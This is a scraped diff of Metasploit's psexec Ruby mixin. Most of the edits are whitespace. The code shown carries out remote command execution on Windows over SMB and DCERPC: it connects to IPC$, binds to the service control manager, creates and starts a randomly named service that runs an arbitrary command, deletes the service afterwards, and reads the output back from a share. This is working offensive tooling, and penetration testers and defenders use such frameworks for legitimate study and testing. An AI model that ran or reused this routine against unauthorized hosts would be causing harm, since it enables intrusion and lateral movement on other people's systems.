@@ -13,6 +13,7 @@ module Exploit::Remote::Psexec
13
13
include Msf ::Exploit ::Remote ::DCERPC
14
14
include Msf ::Exploit ::Remote ::SMB
15
15
16
+
16
17
# Retrives output from the executed command
17
18
# @param smbshare [String] The SMBshare to connect to. Usually C$
18
19
# @param ip [IP Address] Remote Host to Connect To
@@ -21,7 +22,6 @@ module Exploit::Remote::Psexec
21
22
# @return output or nil if fails
22
23
def get_output ( smbshare , ip , file )
23
24
begin
24
- print_status ( "Getting the command output..." )
25
25
simple . connect ( "\\ \\ #{ ip } \\ #{ smbshare } " )
26
26
outfile = simple . open ( file , 'ro' )
27
27
output = outfile . read
@@ -42,14 +42,11 @@ def get_output(smbshare, ip, file)
42
42
# @param command [String] Should be a valid windows command
43
43
# @return true if everything wen't well
44
44
def psexec ( command )
45
-
46
45
simple . connect ( "\\ \\ #{ datastore [ 'RHOST' ] } \\ IPC$" )
47
-
48
46
handle = dcerpc_handle ( '367abb81-9844-35f1-ad32-98f038001003' , '2.0' , 'ncacn_np' , [ "\\ svcctl" ] )
49
47
vprint_status ( "#{ peer } - Binding to #{ handle } ..." )
50
48
dcerpc_bind ( handle )
51
49
vprint_status ( "#{ peer } - Bound to #{ handle } ..." )
52
-
53
50
vprint_status ( "#{ peer } - Obtaining a service manager handle..." )
54
51
scm_handle = nil
55
52
stubdata =
@@ -63,16 +60,13 @@ def psexec(command)
63
60
print_error ( "#{ peer } - Error: #{ e } " )
64
61
return false
65
62
end
66
-
67
63
servicename = Rex ::Text . rand_text_alpha ( 11 )
68
64
displayname = Rex ::Text . rand_text_alpha ( 16 )
69
65
holdhandle = scm_handle
70
66
svc_handle = nil
71
67
svc_status = nil
72
-
73
68
stubdata =
74
69
scm_handle + NDR . wstring ( servicename ) + NDR . uwstring ( displayname ) +
75
-
76
70
NDR . long ( 0x0F01FF ) + # Access: MAX
77
71
NDR . long ( 0x00000110 ) + # Type: Interactive, Own process
78
72
NDR . long ( 0x00000003 ) + # Start: Demand
@@ -96,18 +90,15 @@ def psexec(command)
96
90
print_error ( "#{ peer } - Error: #{ e } " )
97
91
return false
98
92
end
99
-
100
93
vprint_status ( "#{ peer } - Closing service handle..." )
101
94
begin
102
95
response = dcerpc . call ( 0x0 , svc_handle )
103
96
rescue ::Exception
104
97
end
105
-
106
98
vprint_status ( "#{ peer } - Opening service..." )
107
99
begin
108
100
stubdata =
109
101
scm_handle + NDR . wstring ( servicename ) + NDR . long ( 0xF01FF )
110
-
111
102
response = dcerpc . call ( 0x10 , stubdata )
112
103
if dcerpc . last_response != nil and dcerpc . last_response . stub_data != nil
113
104
svc_handle = dcerpc . last_response . stub_data [ 0 , 20 ]
@@ -116,7 +107,6 @@ def psexec(command)
116
107
print_error ( "#{ peer } - Error: #{ e } " )
117
108
return false
118
109
end
119
-
120
110
vprint_status ( "#{ peer } - Starting the service..." )
121
111
stubdata =
122
112
svc_handle + NDR . long ( 0 ) + NDR . long ( 0 )
@@ -128,7 +118,6 @@ def psexec(command)
128
118
print_error ( "#{ peer } - Error: #{ e } " )
129
119
return false
130
120
end
131
-
132
121
vprint_status ( "#{ peer } - Removing the service..." )
133
122
stubdata =
134
123
svc_handle
@@ -139,19 +128,18 @@ def psexec(command)
139
128
rescue ::Exception => e
140
129
print_error ( "#{ peer } - Error: #{ e } " )
141
130
end
142
-
143
131
vprint_status ( "#{ peer } - Closing service handle..." )
144
132
begin
145
133
response = dcerpc . call ( 0x0 , svc_handle )
146
134
rescue ::Exception => e
147
135
print_error ( "#{ peer } - Error: #{ e } " )
148
136
end
149
-
150
137
select ( nil , nil , nil , 1.0 )
151
138
simple . disconnect ( "\\ \\ #{ datastore [ 'RHOST' ] } \\ IPC$" )
152
139
return true
153
140
end
154
141
142
+
155
143
# This method is called by file_dropper to remove files droped
156
144
# By your module
157
145
#
@@ -166,6 +154,7 @@ def file_rm(file)
166
154
psexec ( delete )
167
155
end
168
156
157
+
169
158
# This method stores files in an Instance array
170
159
# The files are then deleted from the remote host once
171
160
# the cleanup_after method is called
@@ -178,6 +167,7 @@ def register_file_for_cleanup(*file)
178
167
@dropped_files += file
179
168
end
180
169
170
+
181
171
# This method removes any files that were dropped on the remote system
182
172
# and marked with the register_file_for_cleanup method
183
173
def cleanup_after
0 commit comments